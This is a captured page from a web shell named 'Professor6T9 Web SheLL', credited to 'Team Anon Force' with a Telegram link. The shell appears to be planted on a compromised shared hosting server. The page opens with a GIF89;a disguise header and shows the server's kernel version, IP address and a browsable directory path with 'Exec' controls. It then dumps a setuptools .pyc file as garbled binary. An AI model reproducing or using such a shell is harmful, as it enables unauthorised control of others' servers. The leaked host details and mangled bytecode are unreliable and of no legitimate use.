GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python312
/
lib
/
python3.12
/
site-packages
/
setuptools
/
command
/
__pycache__
[ HOME ]
Exec
Submit
test.cpython-312.pyc
� t��e� � �� � d dl Z d dlZd dlZd dlZd dlZd dlZd dlmZmZ d dl m Z d dlmZ d dlm Z mZmZmZmZmZmZ ddlmZ d dlmZ d d lmZ d d lmZ G d� de� Z G d � d� Z G d� de� Zy)� N)�DistutilsError�DistutilsOptionError)�log)� TestLoader)�resource_listdir�resource_exists�normalize_path�working_set�evaluate_marker�add_activation_listener�require� )�metadata)�Command)�unique_everseen)� pass_nonec � � e Zd Zd� Zdd�Zy)�ScanningLoaderc �L � t j | � t � | _ y �N)r �__init__�set�_visited��selfs ��/builddir/build/BUILDROOT/alt-python312-setuptools-69.0.2-1.el8.x86_64/opt/alt/python312/lib/python3.12/site-packages/setuptools/command/test.pyr zScanningLoader.__init__ s � ����D�!���� � Nc � � || j v ry| j j |� g }|j t j | |� � t |d� r|j |j � � t |d� r�t |j d� D ]{ }|j d� r|dk7 r|j dz |dd z }n-t |j |d z � r|j dz |z }n�\|j | j |� � �} t |� d k7 r| j |� S |d S )a Return a suite of all tests cases contained in the given module If the module is a package, load tests from all the modules in it. If the module has an ``additional_tests`` function, call it and add the return value to the tests. N�additional_tests�__path__� z.pyz__init__.py�.���z/__init__.py� r )r �add�appendr �loadTestsFromModule�hasattrr r �__name__�endswithr �loadTestsFromName�len� suiteClass)r �module�pattern�tests�file� submodules r r'